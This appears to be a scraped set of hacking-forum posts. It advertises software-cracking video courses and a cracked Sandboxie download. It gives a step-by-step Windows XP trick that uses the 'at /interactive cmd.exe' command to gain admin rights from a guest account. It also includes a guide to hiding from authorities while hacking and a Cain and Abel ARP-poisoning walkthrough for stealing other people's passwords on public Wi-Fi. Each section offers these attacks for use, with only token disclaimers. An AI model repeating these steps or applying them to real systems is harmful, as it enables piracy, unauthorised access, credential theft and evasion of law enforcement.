[Tut]Learn how to crack any Software - Full detailed guide

Professional software crackers are ready to reveal their secrets!
Learn how to crack software with one’s own hands!»


From: Moshe Cogan, practicing software cracker

We are the first one to offer the most detailed, interesting and entertaining interactive video tutorials on software cracking. Experienced crackers will demonstrate and comment each step of software cracking.

You will study a detailed, step by step lessons created by a real practicing cracker. You don’t need to be a PC guru and don’t even have to master any software programming languages. We will show you how to crack software with both the most simple and the most sophisticated protection systems.

This is the valuable part of our training program. At the date, we have done 36 interactive video lessons, that will let you know all the ins and outs of software cracking. We will add new videos per our members’ requests!
Videos are 20-30 mins each. Every action, every click and every event is commented. We give an explanation of what we do and why we do it like that.



List of videos:
Windows cracking [ready to watch and learn!]:
Intro for noobs, asm basics, simple patching — 2 videos
Debugging, tracing, analyzing — 2 videos
Making keyfiles — 1 video
Different methods of patching — 4 videos
Finding serial numbers — 1 video
Removing “nag” screens — 1 video
Cracking Visual Basic software — 2 videos
Cracking Delphi software — 2 videos
Making a “self-keygen” — 1 video
Cracking using resources — 1 video
Introto packers and protectors — 1 video
Unpacking ASProtect, Armadillo, tElock — 5 videos
“Inline” patching — 2 videos;
Killing online servers check — 2 videos;
Creating loaders — 2 videos
Cracking tricks, anti-debugging, rebuilding PE — 3 videos
Creating a keygen — 1 video
…and more — total 36 videos on Windows cracking!
.NET cracking [in process, coming soon to members area]:
Patching .NET applications — 1 video
Making a keygen on .NET — 1 video
Mobile cracking [in process, coming soon to members area]:
Cracking Windows Mobile software — 2 videos
Cracking Symbian software — 1 video
Cracking iPhone/iPod software — 1 video
Scripts crakcing [in process, coming soon to members area]:
Nulling a simple PHP script — 1 video
Nulling Zended and Ioncubed PHP scripts — 1 video
..and more, per our members’ requests!
Basically, you have a full cracking training course in front you, including everything starting from cracking basics to keygen creation.

Download:

http://adfoc.us/609251

Password for archive is:

imglory.com
 

Sandboxie-run/test all your applications inside a sand box


SANDBOXIE v3.16 CRACKED
Sandboxie runs your programs in an isolated space which prevents them from making permanent changes to other programs and data in 
your computer. 
 
 The red arrows indicate changes flowing from a running program into your computer. The box labeled Hard disk (no sandbox) shows changes by a program running normally. The box labeled Hard disk (with sandbox) shows changes by a program running under Sandboxie. The animation illustrates that Sandboxie is able to intercept the changes and isolate them within a sandbox, depicted as a yellow rectangle. It also illustrates that grouping the changes together makes it easy to delete all of them at once.

Benefits of the Isolated Sandbox

* Secure Web Browsing: Running your Web browser under the protection of Sandboxie means that all malicious software downloaded by the browser is trapped in the sandbox and can be discarded trivially.

* Enhanced Privacy: Browsing history, cookies, and cached temporary files collected while Web browsing stay in the sandbox and don't leak into Windows.

* Secure E-mail: Viruses and other malicious software that might be hiding in your email can't break out of the sandbox and can't infect your real system.

* Windows Stays Lean: Prevent wear-and-tear in Windows by installing software into an isolated sandbox.

Sandboxie Control :
Sandboxie is operated primarily through the Sandboxie Control program. This program adds the yellow Sandboxie icon to the system notification ("tray") area of your taskbar.
The sandboxed program should appear in the main window of Sandboxie Control.

 The window displays the list of programs that are currently running sandboxed under the supervision of Sandboxie. Initially there is just one sandbox, DefaultBox, however, more sandboxes can be created; see the Create New Sandbox command in the Sandbox Menu.

The picture above shows Sandboxie is running three programs. The first, iexplore.exe, stands for Internet Explorer, as this tutorial assumes Internet Explorer is the Web browser in use. If the default Web browser in your system is Firefox, or Opera, then you would see firefox.exe or opera.exe, respectively, as the first program running in the sandbox.

The screenshot shows two more programs are running, SandboxieRpcss.exe and SandboxieDcomLaunch.exe. These support programs are part of Sandboxie. If they are needed, they will be automatically started, without any explicit action on your part.

You should now have your Web browser running sandboxed. It can be Internet Explorer or any other browser.

The browser program may make changes to your computer. These changes will all be trapped in the sandbox.

Try it now: Right-click on the following link, and save the file to your desktop. If you're using Internet Explorer, this is the Save Target As command in the right-click menu. If you're using Firefox, this is the Save Link As command in the right-click menu.
In the default and recommended configuration, Sandboxie will identify that a file was saved to an interesting location -- your desktop, in this case -- and will offer Immediate Recovery for the file.
RUNNING A PROGRAM IN SANDBOX :
 DOWNLOAD FULL CRACKED SANDBOXIE v3.54 FROM : 
 COPY AND OVER WRITE THE FILES GIVEN IN CRACK FOLDER TO THE INSTALLED FOLDER IN YOUR SYSTEM
 

Gain Admin Privileges From Guest Account(for Windows-Xp)



Most of you may have alreadyseen a student of your college or school performing this hack on lab computer. Students generally don't have Administration privileges on lab computers to copy or install applications where they use this hack to gain some real stuff done on PC.

Vulnerability:
Windows command line task scheduler supports interactive mode which works somewhat same as sudo -i or su -i command in Linux/UNIX the only problem is that it does not ask you for password. This vulnerability is patched up in further versions of Windows than XP and works fine even in XP-3.

Procedure:
Open command prompt and type

c:\>time

and note the time, time will be presented in 24 hour clock format. Note this time.
Now open “Task Manager” by typing
“c:\>taskmgr”
now from processes and end explorer.exe .

Now type,

c:\>at [(time displayed in 24 hour clock format)+2 minutes] /interactive cmd.exe
for example
---
c:\>time
The current time is: 0:27:11.68
Enter the new time:
c:\>taskmgr
c:\>at 0:29:00:00 /interactive cmd.exe
--
Now type c:\>exit
and wait for two minutes. After two minutes command prompt will open in interactive mode with all administrative privileges without asking you for password. Now run any command from it it'll run with full administrative privileges so that you can even install programs and applications in system. So type “explorer.exe” in cmd and use system with administrative privilege even when you are in guest account.

Countermeasure: Disable command prompt for guest account.

By the way no college can ever disable command prompt because practicals are done over it, so guys get your stance and enjoy freedom

 

Becoming anonymous, hide IP, hide HDD, hide identity


This tutorial has been written for the Wraith and is NOT for public distibution.
All information in this tutorial is for educational purposes only. Any illegal activity relating to this tutorial is not my responsibility, although I would like to say I don't care how you use it, I do. So please do not use this for Black-hat activities. One day when you grow up you might realise that you have been a skid, by using mass-deface techniques and SQLi for your entire life. Do not just hack a site because it is there. I have a few sites of my own and its annoying, unproductive, and pointless.
Yes



[b]
Hide like a hacker


i- Protection
ii- Encryption
iii- Anonymity
iv- Links

Protection

Basically what I am trying to say in this section is, before you go out hacking other people and other things, just check for a second and make sure it's not as easy to hack your device. There are some pretty simple steps for this though.

Make sure all your security updates are installed, if you have windows firewall disable it.
Download your own firewall. If you are behind a router you can skip this.
Make sure all unused ports are closed.
Check your msconfig, run a few HJT logs and Malwarebyte's to make sure you are not already infected.
Use a keyscambler to prevent keyloggers


It is important that you are not infected because other could see you hacking and steal it from you or alternitively, if they get caught, you get caught. On the other hand you might want to stay infected by a bot or RAT so if and when you are caught you can claim you had know knowledge and the bot controlled your PC and performed the hackl without your knowledge. However I am not someone who intends to be caught. (I'm not really a black hat either)

I don't personally use an AV for many reasons reasons:

It is possible to make an FUD virus, this is likely to be what you get infected with.
It often goes around deleting your stuff without asking.
They slow down your PC and often hog the CPU.
Whilst performing updates it slows down your connection.


FireWall: (not tested)
http://personalfirewall.comodo.com

KeyScrambler:
http://www.qfxsoftware.com

HJT:
http://download.cnet.com/Trend-Micro-Hij...27353.html

Malewarebytes:
http://www.malwarebytes.org

Another way to prvent this is to use a Lixux-based O/S as altohugh these aren't 100% secure they have a lot on Windows machines due to the fact they are less common.

But remember you are not invisible:



Code:
If you downloaded and installed the open-source Unreal IRC server in the last 8 months or so, you’ve been pwned.

"Hi all,

This is very embarrassing…

We found out that the Unreal3.2.8.1.tar.gz file on our mirrors has been replaced quite a while ago with a version with a backdoor (trojan) in it.

This backdoor allows a person to execute ANY command with the privileges of the user running the ircd. The backdoor can be executed regardless of any user restrictions (so even if you have passworded server or hub that doesn’t allow any users in)."


Encryption

Be under no ilussions, this is one of the most important steps to keeping information secret. Now I am a big fan of encryption and here is why:
Code:
"if your encryption program uses 128-bit keys, your particular key could be any of more than 3.4 trillion billion billion billion possible combinations. More likely to win the lottery than to crack that level of encryption using the brute-force method"[b]Or just use RSA 4096-bit and 256-bit AES?

Now I think this says a little bit about how much safer encryption makes you, if you encrypt your HDD using 256-bit, there is little chance even the authorities will crack it.... in your lifetime. However do be aware of local law for example in the UK the new Regulation of Investigatory Powers Act states:

Code:
Code:
Individuals who are believed to have the cryptographic keys necessary for such decryption will face up to 5 years in prison for failing to comply with police or military orders to hand over either the cryptographic keys, or the data in a decrypted form.


The penelties are up to 5 years for terrorism-related inforamtion and 2 years for "All other failures to comply"

Therefore depending on the strength of your offence it could be more wise to with-hold your key on claims of a privacy breach, and face the maximum two years than to hand over your keys.

The program I most recomend for doing this is

TrueCrypt:
http://www.truecrypt.org

True crypt can provdie 256-bit encryption

Code:
The design and strength of all key lengths of the AES algorithm (i.e., 128, 192 and 256) are sufficient to protect classified information up to the SECRET level. TOP SECRET information will require use of either the 192 or 256 key lengths.

Oh and that's not even the most useful part:
Code:
TrueCrypt allows you to create a hidden operating system whose existence will be impossible to prove (provided that certain guidelines are followed — see below). Thus, you will not have to decrypt or reveal the password for the hidden operating system.

As there is a pre-boot authentication process which asks for your encryption password you can have two, one for people to see and one for hacking purposes. This is IMPOSSIBLE to prove so I highly recommed using it, although I don't use it myself...



Anonymity

Now, this is THE MOST IMPORTANT section of the whole tutorial, get this part right and you can pretty much forget about the rest (however if you are performing something illegal following the other steps might help you sleep better.

Hidding your IP and identity is crucial. Here is my prefred methods:

SOCKS5 Proxy
L1 HTTPS Proxy
GCI proxy
Encrypted VPN (no logs)


Diference between SOCKS and HTTP
Code:
SOCKS

Bill wishes to communicate with Jane over the internet, but a firewall exists on his network between them and Bill is not authorized to communicate through it himself. Therefore, he connects to the SOCKS proxy on his network and sends to it information about the connection he wishes to make to Jane. The SOCKS proxy opens a connection through the firewall and facilitates the communication between Bill and Jane. For more information on the technical specifics of the SOCKS protocol, see the sections below.
HTTP

Bill wishes to download a web page from Jane, who runs a web server. Bill cannot directly connect to Jane's server, as a firewall has been put in place on his network. In order to communicate with the server, Bill connects to his network's HTTP proxy. His internet browser communicates with the proxy in exactly the same way it would the target server—it sends a standard HTTP request header. The HTTP proxy reads the request and looks for the Host header. It then connects to the server specified in the header and transmits any data the server replies with back to Bill.


Remember:

Code:
HTTP proxies are traditionally more HTTP protocol aware and do more high level filtering (even though that usually only applies to GET and POST methods, not CONNECT). SOCKS proxies can also forward UDP traffic and work in reverse - HTTP proxies can't do that.

Due to the restrictions of a HTTP proxy, they ONLY work for HTTP traffic and do not support UDP and other types of proxy uses. the reason is because they "infer the address of the server and therefore may only be used for HTTP traffic".

Use both HTTP and SOCKS if possible though this is known as "Proxy Chaining" this is used to make your actions harder to trace but its not truely effective.

REMEBER: Do not use an L3 HTTP proxy as they show your true IP in the header and are therefore essentially pointless.

VPN

This is by far the most effective way to conceal your identity. It channels you traffic and encrpts it with 128-bit. Although some support 256-bit. Often a VPN is much more reliable and does not slow down your connection as much (in fact I haven't noticed mine at all)

A VPN is a virtual Private Network

Code:
"Secure VPNs use cryptographic tunneling protocols to provide confidentiality by blocking intercepts  and packet sniffing, allow sender authentication to block identity spoofing, and provide message integrity by preventing message alteration."


The best VPN's are paid but here is a good free one: (I originally had problems with installing but sorted it out pretty quick, I use a paid oe now so it didn't really matter in the end)

https://www.ultravpn.fr/download.htm

ProxyFirewall is a good program which runs SOCKS and HTTP proxies

[http://uniqueinternetservices.com/proxy-firewall-download.html

Bibliography:


UK law report:
http://arstechnica.com/tech-policy/news/...l-time.ars

Regulation of Investigatory Powers Act:
http://www.opsi.gov.uk/acts/acts2000/ukpga_20023_en_8

Goverment stance on AES:
http://csrc.nist.gov/groups/STM/cmvp/doc...SS15FS.pdf

Wikipedia review on AES:
http://en.wikipedia.org/wiki/Advanced_En...d#Security

TrueCrypt Hidden o/s:
http://www.truecrypt.org/docs/?s=hidden-...ing-system

SOCKS Information and example:
http://en.wikipedia.org/wiki/SOCKS

Proxy Chaining:
http://www.freeproxy.ru/en/free_proxy/fa...aining.htm

Linux infection news:
http://www.zdnet.com/blog/bott/linux-inf...dated/2206

Official IRCd announcement:
http://forums.unrealircd.com/viewtopic.php?t=6562


Downloads linked:

Proxy firewall:
http://uniqueinternetservices.com/proxy-...nload.html

TrueCrypt:
http://www.truecrypt.org/downloads

UltraVPN:
https://www.ultravpn.fr/download.htm

FireWall: (not tested)
http://personalfirewall.comodo.com

KeyScrambler:
http://www.qfxsoftware.com

HJT:
http://download.cnet.com/Trend-Micro-Hij...27353.html

Malewarebytes:
http://www.malwarebytes.org

[/b]
Hi

Thnx @WhiteFlame


Hi
 

[Tut] Capture Passwords using Cain and Abel

[Image: Cainandabeltitle-1.png]

This Tutorial is not written by me but hope this will helpful for you.Credit goes to original author 
Cataclysm31536
To APR you will need the following:

- connected to a network (with more than one person in it.)
- Cain and Abel

You can go somewhere with a network if you need victims.. (Starbucks)

You can download Cain and Abel software here.

After installing the program to your computer, open it.

[Image: Cainandabelopen.png]

[Image: snifferstart.png]

Make sure that your scan settings look like mine.

[Image: scanningMACaddresses.png]

I have blacked out the ip and MAC addresses for peoples' protection.

[Image: MACsnanresults.png]

Open the APR tab and then proceed by activating the sniffer button and then adding targets.

[Image: APRstart-1.png]

Click any ip on the left column and highlight your target(s) ip on the right, then click okay to exit.

[Image: APRtargets.png]

Click the radioactive button to begin APR. Then click the passwords tab and navigate to the HTTP tab. Here you will see all of your victims traffic, any URL they visit is logged to your right.

[Image: httpresults-2.png]

As you can see, the slave logged into facebook. The username and password is encrypted so you'll have to right click the search result and then select send to cracker, where you can crack the username and 
password. 

[Image: facebookresults.png]


This tutorial is for educational purposes only, in no way am I responsible for any damage caused by MITM attacks or APR poisoning. The user accepts all responsibility. Please be aware that MITM attacks can cause your computer to go into DoS, buffer overflow.

- I hope you enjoyed the tutorial! It's one of my first, please comment!